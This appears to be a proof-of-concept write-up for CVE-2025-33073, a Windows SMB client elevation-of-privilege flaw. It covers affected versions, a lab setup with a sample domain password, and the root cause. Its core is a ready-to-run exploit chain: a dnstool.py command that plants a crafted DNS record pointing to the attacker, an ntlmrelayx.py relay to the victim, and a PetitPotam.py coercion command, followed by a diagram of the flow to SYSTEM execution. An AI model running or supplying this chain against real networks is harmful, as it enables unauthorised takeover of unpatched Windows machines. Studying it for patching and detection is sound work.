Windows SMB Client Elevation of Privilege Vulnerability
The CVE-2025-33073 vulnerability exists in Windows SMB, allowing authenticated remote attackers to forcelocal authentication reflection on machines without enforced SMB signing by tampering with DNS records, ultimately executing arbitrary commands with SYSTEM privileges.
Windows 10 (all versions without KB5048685 or later updates)
Windows 11 (all versions without KB5048685 or later updates)
Windows Server 2016/2019/2022 (versions without latest January 2025 security updates)
Windows Server 2025 (versions without KB5048685)
Note: Systems with SMB signing disabled are highly vulnerable.
| Role | OS | IP Address | Requirements |
|---|---|---|---|
| Domain Controller | Windows Server 2019/2022 | 192.168.2.1 | AD DS + DNS services |
| Target/Victim | Windows 10/11/Server | 192.168.2.3 | Domain-joined |
| Attacker | Kali Linux/Ubuntu | 192.168.2.5 | Penetration tools |
Domain Configuration:
Domain regular user account: test.com\test1
Password: Test..111
use dnstool.py
python dnstool.py -u 'test.com\test1' -p 'Test..111' -r win10pc1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 192.168.2.5 --action add 192.168.2.1Parameters:
-u: Domain credentials (format:DOMAIN\username)-p: User password-r: DNS record name (prefix + fixed suffix1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA)-d: Attacker IP (where DNS record points)- Last argument: DNS server IP (Domain Controller)
sudo ntlmrelayx.py -t 192.168.2.3 -smb2supportParameters:
-t: Target victim IP-smb2support: Enable SMB2 protocol support
python PetitPotam.py -d test.com -u test1 -p Test..111 win10pc1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 192.168.2.3[Attacker] --1. Add DNS--> [Domain Controller DNS]
| |
| v
+--2. Start ntlmrelayx [Malicious DNS Record]
| |
+--3. Coerce Auth--> [Target] --4. Auth to Malicious DNS
| |
+<--5. Relay NTLM------<-----+
|
v
[Execute as SYSTEM on Target]
Terminal 1 - ntlmrelayx.py:
Terminal 2 - PetitPotam.py:
The vulnerability exists in the Windows SMB client's authentication handling mechanism, specifically in how it validates reflected authentication attempts.
Key Components:
- DNS Spoofing Layer: Windows resolves specially crafted DNS records without proper security zone validation
- Authentication Reflection: SMB client accepts relayed authentication from itself when SMB signing is not enforced
- Privilege Context: Relayed machine account authentication grants SYSTEM-level access
The Attack Vector:
- Attacker adds DNS record with special suffix that triggers SMB client behavior
- Coercion tool forces target to authenticate to attacker-controlled name
- SMB client resolves malicious DNS, initiates authentication
- Attacker relays authentication back to victim machine
- Victim accepts its own relayed credentials and grants SYSTEM access